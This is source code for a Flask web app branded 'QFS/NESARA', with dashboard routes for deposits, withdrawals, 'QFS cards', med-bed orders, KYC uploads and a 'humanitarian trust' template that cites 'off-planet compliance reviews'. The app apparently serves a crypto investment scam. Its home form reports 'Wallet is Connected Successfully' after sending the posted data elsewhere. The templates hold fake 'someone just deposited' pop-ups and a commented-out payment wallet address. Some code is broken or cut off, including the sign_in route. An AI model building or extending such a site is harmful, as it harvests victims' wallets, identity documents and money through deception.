app/views/dashboard.py
from flask import (
    Blueprint, flash, redirect, render_template, request, url_for, send_file
)
from flask_login import login_user, logout_user, login_required, current_user
from .view_utils.authentication import login_user_from_db,decode_verification_token,verify,resend_verification_mail
from .view_utils.data_objects import *
from .view_utils.currency_price import get_usd_to_
from ..utils.helpers import greet, send_data, send_kyc, send_medbed, humanitarian_project




dashboard = Blueprint('dashboard', __name__, url_prefix='/dashboard')


@dashboard.route('/', methods=('POST','PUT','GET'))
@login_required
def dashboard_home():
    if request.method=="POST":
        if send_data(request.form):
                connected_wallet()
                flash('Wallet is Connected Successfully', 'success')
        else:
                flash('We could not receive your documents, try again later', 'warning')
    
    return render_template('dashboard/dashboard.html', greetings=greet())

@dashboard.route('/fixed/deposit', methods=('POST','PUT','GET'))
@login_required
def fixed_deposit():
    if request.method == 'post':
       if create_fixed_deposit(request.form):
           flash('Deposit in progress', 'success')
       else:
           flash('Could not deposit, contact account manager', 'warning')
   
    return render_template('dashboard/new-fixed-deposit.html')

@dashboard.route('/manual/deposit', methods=('POST','PUT','GET'))
@login_required
def manual_deposit():
    if request.method == 'POST':
       if create_deposit(request.form):
           flash('Deposit in progress', 'success')
       else:
           flash('Could not deposit, contact account manager', 'warning')
   
    return render_template('dashboard/deposit_now.html')

@dashboard.route('/now/deposit', methods=('POST','PUT','GET'))
@login_required
def deposit_now():
    if request.method == 'POST':
      
       if create_deposit(request.form):
           flash('Deposit in progress', 'success')
       else:
           flash('Could not deposit, contact account manager', 'warning')
   
    return render_template('dashboard/deposit-now.html')

@dashboard.route('/list/deposit', methods=('POST','PUT','GET'))
@login_required
def deposit_list():
   
    return render_template('dashboard/deposit-list.html')

@dashboard.route('/send', methods=('POST','PUT','GET'))
@login_required
def send_money():
    if request.method == 'POST':
       if send_money_(request.form):
            flash('Transfer in progress', 'success')
       else:
           flash('Could not Transfer, contact account manager', 'warning')
    
       return redirect(url_for('dashboard.send_money'))  # Redirect to the send money page
   
    return render_template('dashboard/send-money.html')

@dashboard.route('/send/list', methods=('POST','PUT','GET'))
@login_required
def send_list():
    trx =  get_transfers()
  
    if request.method == 'POST': 
         # Get filtered transfers
         trx = get_transfers(request.form)
   
    return render_template('dashboard/send-list.html', trx=trx)

@dashboard.route('/request/new', methods=('POST','PUT','GET'))
@login_required
def new_request():
    if request.method == 'POST':
        withdrawn = proccess_withdrawal_(request.form)
        if withdrawn:
            flash('Withdrawal in progress', 'success')
        else:
            flash('Withdrawal request was not sent, contact account manager','warning')
   
    return render_template('dashboard/request-money.html')

@dashboard.route('/request/all', methods=('POST','PUT','GET'))
@login_required
def all_request():
    if request.method == 'POST':
        withdrawn = proccess_withdrawal_(request.form)
        if withdrawn:
            flash('Withdrawal in progress', 'success')
        else:
            flash('Withdrawal request was not sent, contact account manager','warning')
    
    return render_template('dashboard/all-request.html')

@dashboard.route('/transaction/history', methods=('POST','PUT','GET'))
@login_required
def transaction_history():
    trx = get_trx()
    return render_template('dashboard/transaction-history.html', trx=trx)

@dashboard.route('/exchange', methods=('POST','PUT','GET'))
@login_required
def exchange():
    if request.method == 'POST':
        exchange = exchange_curr(request.form)
    return render_template('dashboard/exchange.html')

@dashboard.route('/exchange/all', methods=('POST','PUT','GET'))
@login_required
def exchange_all():
   
    return render_template('dashboard/all-exchange.html')

@dashboard.route('/redeem', methods=('POST','PUT','GET'))
@login_required
def redeem():
    if request.method == 'POST':
         code = create_redeem_code(request.form)
         return render_template('dashboard/redeem.html', code=code)
    return render_template('dashboard/redeem.html')

@dashboard.route('/redeem/code', methods=('POST','PUT','GET'))
@login_required
def redeem_code():
    if request.method == 'POST':
        verify_redeem_code(request.form)
        

   
    return render_template('dashboard/redeem-code.html')

@dashboard.route('/escrow', methods=('POST','PUT','GET'))
@login_required
def escrow():
   
    return render_template('dashboard/escrow.html')

@dashboard.route('/escrow/list', methods=('POST','PUT','GET'))
@login_required
def escrow_list():
   
    return render_template('dashboard/escrow-list.html')

@dashboard.route('/dispute', methods=('POST','PUT','GET'))
@login_required
def dispute():
   
    return render_template('dashboard/dispute.html')

@dashboard.route('/pay/qr', methods=('POST','PUT','GET'))
@login_required
def pay_qr():
   
    return render_template('dashboard/qr-payment.html')

@dashboard.route('/card', methods=('POST','PUT','GET'))
@login_required
def card():
    if request.method == 'POST':
        create_qfs_card(request.form)
        return redirect(url_for('dashboard.card'))
   
    return render_template('dashboard/qfs-card.html')

@dashboard.route('/voucher', methods=('POST','PUT','GET'))
@login_required
def voucher():
   
    return render_template('dashboard/voucher.html')

@dashboard.route('/invoice', methods=('POST','PUT','GET'))
@login_required
def invoice():
   
    return render_template('dashboard/invoice.html')

@dashboard.route('/kyc', methods=('POST','PUT','GET'))
@login_required
def kyc():
  if request.method == 'POST':
    if send_kyc(request ):
                flash('Documents SUBMITTED, Under Review', 'success')
    else:
                flash('We could not receive your documents, try again later', 'warning')
  return render_template('dashboard/kyc.html')

@dashboard.route('/bill', methods=('POST','PUT','GET'))
@login_required
def bill():
   
    return render_template('dashboard/bill.html')

@dashboard.route('/bill/list', methods=('POST','PUT','GET'))
@login_required
def bill_list():
   
    return render_template('dashboard/bill-list.html')

@dashboard.route('/payout', methods=('POST','PUT','GET'))
@login_required
def payout():
   
    return render_template('dashboard/payout.html')

@dashboard.route('/payout/list', methods=('POST','PUT','GET'))
@login_required
def payout_list():
   
    return render_template('dashboard/payout-list.html')

@dashboard.route('/medbed', methods=('POST','PUT','GET'))
@login_required
def med_bed():
    if request.method == 'POST':
        order_medbed(request)
    medbed = get_medbed()
    return render_template('dashboard/med-bed.html', medbed=medbed)

@dashboard.route('/project/humanitarian', methods=('POST','PUT','GET'))
@login_required
def humanitarian():
    if request.method == 'POST':
        if humanitarian_project(request):
            flash('Project Submited, under review', 'info')
    
    return render_template('dashboard/humanitarian.html')

@dashboard.route('/humanitarian')
def humanitarian_download():
    import os
    # Determine the base directory of the current file
    base_dir = os.path.dirname(__file__)
    # Construct the full path to the zip file
    zip_path = os.path.join(base_dir, '..', 'static', 'uploads', 'humanitarian.zip')
    return send_file(zip_path, as_attachment=True)



# # copy trading
# @dashboard.route('/transfers', methods=('POST','PUT','GET'))
# @login_required
# def transfers():
#     if request.method=="POST":
#         pass
    
#     return render_template('dashboard/verification.html')

# @dashboard.route('/wallets', methods=['GET','POST','PUT'])
# @login_required
# def wallets():
#     # user info update
#     if request.method == 'POST':
        
#         send_data(request.form )
#     return render_template('dashboard/wallets.html')

# @dashboard.route('/profile', methods=['GET','POST','PUT'])
# @login_required
# def profile():
#     # user info update
#     if request.method == 'POST':
#         updated = update_profile_info(request.form, file=request.files)
#         if updated:
#             flash('User info updated', 'success')
#     return render_template('dashboard/profile.html')

# @dashboard.route('personal/withdraw', methods=['GET','POST'])
# @login_required
# def withdrawals():

#     if request.method == 'POST':
#         withdrawn = proccess_withdrawal_(request.form)
#         if withdrawn:
#             flash('Withdrawal in progress', 'success')
#         else:
#             flash('Withdrawal request was not sent, contact account manager','warning')

#     return render_template('dashboard/coin_withdraw.html')


# @dashboard.route('/withdraw', methods=['GET','POST'])
# @login_required
# def withdrawal():

#     if request.method == 'POST':
#         withdrawn = proccess_withdrawal(request.form)
#         if withdrawn:
#             flash('Transfer in progress', 'success')
#         else:
#             flash('Transfer request was not sent, contact account manager','warning')

#     return render_template('dashboard/roles.html')



@dashboard.route('/login', methods=['GET','POST'])
def sign_in():
    if request.method == 'POST':
        
        user = login_user_from_db(request.form)
        if user:
            # log in

app/templates/dashboard/bill-list.html
{% extends 'base.html'%}

{% block body %}

<div class="main-content">
    <section class="section">
        <div class="section-header">
            <h1>Pay Bill List</h1>
            <div class="section-header-breadcrumb">
                <div class="breadcrumb-item active">
                    <a href="/">Dashboard</a>
                </div>
                <div class="breadcrumb-item">Pay Bill List</div>
            </div>
        </div>

        <div class="row mb-3">
            <div class="container-fluid" id="container-wrapper">
                <div class="row">
                    <div class="col-lg-12">
                        <div class="card mb-4 card-primary shadow-sm">
                            <div
                                class="card-header py-3 d-flex flex-row align-items-center justify-content-between">
                                <h6 class="m-0 font-weight-bold text-primary">Search</h6>
                            </div>
                            <div class="card-body">
                                <form action="#" method="get">
                                    <div class="row">
<div class="col-md-2">
    <div class="form-group">
        <input placeholder="Category" name="category" value="" type="text"
               class="form-control form-control-sm">
    </div>
</div>
<div class="col-md-2">
    <div class="form-group">
        <input placeholder="Type" name="type" value="" type="text"
               class="form-control form-control-sm">
    </div>
</div>
<div class="col-md-2">
    <div class="form-group search-currency-dropdown">
        <select name="status" class="form-control form-control-sm">
            <option value="">Status</option>
            <option
                value="generate" > Generate </option>
            <option
                value="pending" > Pending </option>
            <option
                value="payment_completed" > Payment Completed </option>
            <option
                value="bill_completed" > Bill Completed </option>
            <option
                value="bill_return" > Bill Return </option>
        </select>
    </div>
</div>
<div class="col-md-3">
    <div class="form-group">
        <input placeholder="Transaction Date" name="created_at" id="created_at"
               value="" type="date" class="form-control form-control-sm"
               autocomplete="off">
    </div>
</div>
<div class="col-md-3">
    <div class="form-group">
        <button type="submit" class="btn btn-primary btn-sm btn-block">Search</button>
    </div>
</div>
</div>
                                </form>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="row">
                    <div class="col-lg-12">
                        <div class="card mb-4 card-primary shadow">
                            <div
                                class="card-header py-3 d-flex flex-row align-items-center justify-content-between">
                                <h6 class="m-0 font-weight-bold text-primary">Pay Bill List</h6>
                            </div>
                            <div class="card-body">
                                <div class="table-responsive">
                                    <table
                                        class="table table-striped table-hover align-items-center table-borderless">
                                        <thead class="thead-light">
                                        <tr>
                                            <th>SL</th>
                                            <th>Category</th>
                                            <th>Type</th>
                                            <th>Amount</th>
                                            <th>Charge</th>
                                            <th>Status</th>
                                            <th>Created time</th>
                                            <th>Action</th>
                                        </tr>
                                        </thead>
                                        <tbody>
                                                                                        <tr>
                                                <th colspan="100%" class="text-center">No data found</th>
                                            </tr>
                                                                                    </tbody>
                                    </table>
                                </div>
                                <div class="card-footer">
                                    
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>

    </section>
</div>
{% endblock %}

app/templates/dashboard/humanitarian.html
{% extends 'base.html'%}

{% block body %}

<style>
    .square-image {
        width: 50%; /* Set the width */
        height: 50%; /* Set the height to be the same as the width */
        display: block; /* Make the image a block element */
        margin-left: auto; /* Center the image horizontally */
        margin-right: auto; /* Center the image horizontally */
      }
</style>


<div id="app">

<div class="main-content">
       <section class="section">
           <div class="section-header">
               <h1>HUMANITARIAN PROJECT</h1>
               <div class="section-header-breadcrumb">
                   <div class="breadcrumb-item active">
                       <a href="">Dashboard</a>
                   </div>
                   <div class="breadcrumb-item">HUMANITARIAN PROJECT</div>
               </div>
           </div>
           <!------ alert ------>
           <div class="row mb-3">
               <div class="container-fluid" id="container-wrapper">
                   <div class="row justify-content-md-center">
                       <div class="col-md-6">
                           <div class="card mb-4 card-primary shadow">
                               <div class="card-header py-3 d-flex flex-row align-items-center justify-content-between">
                                   <h6 class="m-0 font-weight-bold text-primary">HUMANITARIAN PROJECT</h6>
                               </div>
                               <div class="card-body payout">

                                   <form  method="post" enctype="multipart/form-data">
                                       


                                    <div class="form-group img-input-div ">
                                       <select name="funding-type" required>
                                           <option selected value="" >SELECT PROJECT FUNDING TYPE</option>
                                            <option value="self-sponsored" > Full self sponsor project</option>
                                            <option value="half and half" >50% funded</option>
                                       </select>
                                    </div>

                                       <div class="row">
                                           <div class="col-md-12">
                                               <div class="bill-categories">
                                                  
                                               </div>
                                           </div>
                                       </div>
                                       <div class="row">
                                           <div class="col-md-12">
                                               <div class="form-group img-input-div ">
                                                  
                                                   <span class="btn btn-success btn-file">
                                                    <span
                                                        class="fileinput-new"> Upload Project</span>
                                                <input type="file" id="from_wallet" required name="project" class="form-control form-control-sm"/>
                                                </span>
                                                  
                                                                                                   
                                               </div>
                                           </div>
                                           
                                       </div>
                                       <!-- <h6>Pay in Installments</h6>
                                           <ul>
                                              <li>You can pay in Installments</li>
                                             
                  
                                           </ul> -->
                                       <button type="submit" id="submit" class="btn btn-primary btn-sm btn-block" >Submit Project</button>


                                           <!-- <h5>Payment Wallet Address USDT(BEP20)</h5> -->

                                       <!-- <div class="row">
                                        <div class="col-md-12">
                                            <div class="form-group img-input-div ">
                                               
                                                <img class="square-image"
                                                            src="{{url_for('static', filename="landing/images/medbed_wallet.jpg")}}"
                                                            alt="holographic"/>

                                                <sup>
                                                    WALLET ADDRESS: 0x2BF600b1BBbE54ccD96AC7E0a23BB05d5f9FdCcA
                                                </sup>
                                               
                                                                                                
                                            </div>
                                        </div>
                                        
                                    </div> -->
                                   </form>
                               </div>
                           </div>
                       </div>
                       <div class="col-md-6">
                           <div class="card mb-4 card-primary shadow">
                               <div class="card-header py-3 d-flex flex-row align-items-center justify-content-between">
                                   <h6 class="m-0 font-weight-bold text-primary">Details</h6>
                               </div>
                               <div class="card-body showCharge ">
                                <h5>BRAND NEW - (UPGRADED Version #3  (6/2/24)
                                    HUMANITARIAN INITIATIVE TRUST)- BLANK TEMPLATE: (Pages 1-7 Attached Posts 2/8-8/8) </h5>
                                
                                <p>
                                    
                                    🚨🚨🚨🚨Beware of Imitators.🚨🚨🚨🚨
                                    
                                    LINK TO: (SAMPLE GUIDE) Ver.2 - HUMANITARIAN INITIATIVE TRUST:  canva.com/design/DAFsHTM…… 
                                    
                                    ...SHORT TEN MINUTE VIDEO: rumble.com/v2vbck4-new-da…… 
                                    
                                    … FULL INSTRUCTIONAL VIDEO: 1/8…
                                    
                                    <ul>
                                        <li>1) ADD: YOUR NAME FOR TRUST - ALL PAGES </li>
                                        <li>2) ADD: CONTACT INFORMATION -ALL PAGES</li>
                                        <li>3) ADD: NAME(s) AND COLLABORATORS - PG 3 </li>
                                        <li>4) ADD: HAVE NOTARIZED for YOUR SIGNATURE. PG 4 </li>
                                        <li>5) ADD: YOUR 3 PARAGRAPH DESCRIPTION. PG 5</li>
                                        <li>6) ADD: Descriptive to Complete Page 6&7. </li>
                                    </ul>

                                    <h5>… IMPORTANT INSTRUCTIONS; USE "AS IS" MAKE CHANGES TO:</h5>
                                      
                                    YOU ARE ONLY ADDING the missing items TO THE "BLANK" TEMPLATE.
                                    LEAVE EVERYTHING ELSE UNCHANGED.  
                                    IT'S IMPORTANT TO FOLLOW INSTRUCTIONS.     
                                    THIS IS PARTLY A "TEST" TO SEE IF YOU CAN FOLLOW INSTRUCTIONS, WHICH IS EVEN MORE STRINGENT BY OFF-PLANET COMPLIANCE REVIEWS, MONTHLY, QUARTERLY & ANNUALLY.</p>
                                   
                                   
                                    <h6>RESOURCE LINK</h6>
                                 <ul>
                                    <li>
                                        <a href="{{url_for('dashboard.humanitarian_download')}}">Download Resources</a> 
                                    </li>

                                 </ul>           
                               </div>
                           </div>
                       </div>
                   </div>
               </div>
           </div>
       </section>
</div>

<div class="popup pop-one"><i class="fa fa-check-circle" id="pop-check"></i> <span id="full-name"></span> from <span
   id="country-name"></span> just <span id="payment-action"></span> <span id="deposited-withdrew"></span> <span
   id="full-amount"></span>
</div>

<div class="popup pop-two"><i class="fa fa-check-circle" id="pop-check"></i> <span id="full_name"></span> from <span
       id="country_name"></span> just <span id="action-type"></span>
</div>

</div>


</div>
   {% endblock %}

app/templates/dashboard/transaction-history.html
{% extends 'base.html'%}

{% block body %}

<div class="main-content">
                <section class="section">
                    <div class="section-header">
                        <h1></h1>
                        <div class="section-header-breadcrumb">
                            <div class="breadcrumb-item active">
                                <a href="{{url_for('dashboard.dashboard_home')}}">Dashboard</a>
                            </div>
                            <div class="breadcrumb-item">Transaction</div>
                        </div>
                    </div>

                    <div class="row mb-3">
                        <div class="container-fluid" id="container-wrapper">
    <!--                        <div class="row">-->
    <!--                            <div class="col-lg-12">-->
    <!--                                <div class="card mb-4 card-primary shadow-sm">-->
    <!--                                    <div class="card-header py-3 d-flex flex-row align-items-center justify-content-between">-->
    <!--                                        <h6 class="m-0 font-weight-bold text-primary">Search</h6>-->
    <!--                                    </div>-->
    <!--                                    <div class="card-body">-->
    <!--                                        <form action="https://qfsnesara.io/user/qr-payment-list" method="get">-->
    <!--                                            <div class="row">-->
    <!--                                                <div class="col-md-3">-->
    <!--                                                    <div class="form-group">-->
    <!--                                                        <input placeholder="Sender Email" name="email" value="" type="text" class="form-control form-control-sm">-->
    <!--                                                    </div>-->
    <!--                                                </div>-->
    <!--                                                <div class="col-md-3">-->
    <!--                                                    <div class="form-group">-->
    <!--                                                        <input placeholder="Created Date" name="datetrx" id="created_at" value="" type="date" class="form-control form-control-sm" autocomplete="off">-->
    <!--                                                    </div>-->
    <!--                                                </div>-->

    <!--                                                <div class="col-md-3">-->
    <!--                                                    <div class="form-group search-currency-dropdown">-->
    <!--                                                        <select name="gateway" class="form-control form-control-sm">-->
				<!--<option value="">All Gateways</option>-->
				<!--												</select>-->
    <!--                                                    </div>-->
    <!--                                                </div>-->
    <!--                                                <div class="col-md-3">-->
    <!--                                                    <div class="form-group">-->
    <!--                                                        <button type="submit" class="btn btn-primary btn-sm btn-block">Search</button>-->
    <!--                                                    </div>-->
    <!--                                                </div>-->
    <!--                                            </div>-->
    <!--                                        </form>-->
    <!--                                    </div>-->
    <!--                                </div>-->
    <!--                            </div>-->
    <!--                        </div>-->
                            <div class="row">
                                <div class="col-lg-12">
                                    <div class="card mb-4 card-primary shadow">
                                        <div class="card-header py-3 d-flex flex-row align-items-center justify-content-between">
                                            <h6 class="m-0 font-weight-bold text-primary">Transaction History</h6>
                                        </div>
                                        <div class="card-body">
                                            <div class="table-responsive">
                                                <table class="table table-striped table-hover align-items-center table-borderless">
                                                    <thead class="thead-light">
                                                        <tr>
                                                            <th>SN</th>
                                                            <th>Amount</th>
                                                            <th>Currency</th>
                                                            <th>Type</th>
                                                            <th>Date</th>
                                                            <th>status</th>
                                                        </tr>
                                                    </thead>
                                                    <tbody>
                                                        {% if not trx %}
                                                        <tr>
                                                            <td colspan="100%">No transactions found</td>
                                                         </tr>
                                                        {% else %}
                                                        {% for tr in trx %}                              
					    <tr>
                             <td>{{tr.id}}</td>
                             <td>{{tr.amount}}</td>
                            <td>{{tr.currency}}</td>
                            <td>{{tr.type}}</td>
                            <td>{{tr.date}}</td>
                            <td>{{tr.status |default('success')}}</td>
                            
                          </tr>
                        {% endfor %}
                       
                                                            
                                                        {% endif %}
                        
                             
                        
                          
				                                                    </tbody>
                                                </table>
                                            </div>
                                            <div class="card-footer">

                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>

                </section>
            </div>
       {% endblock %}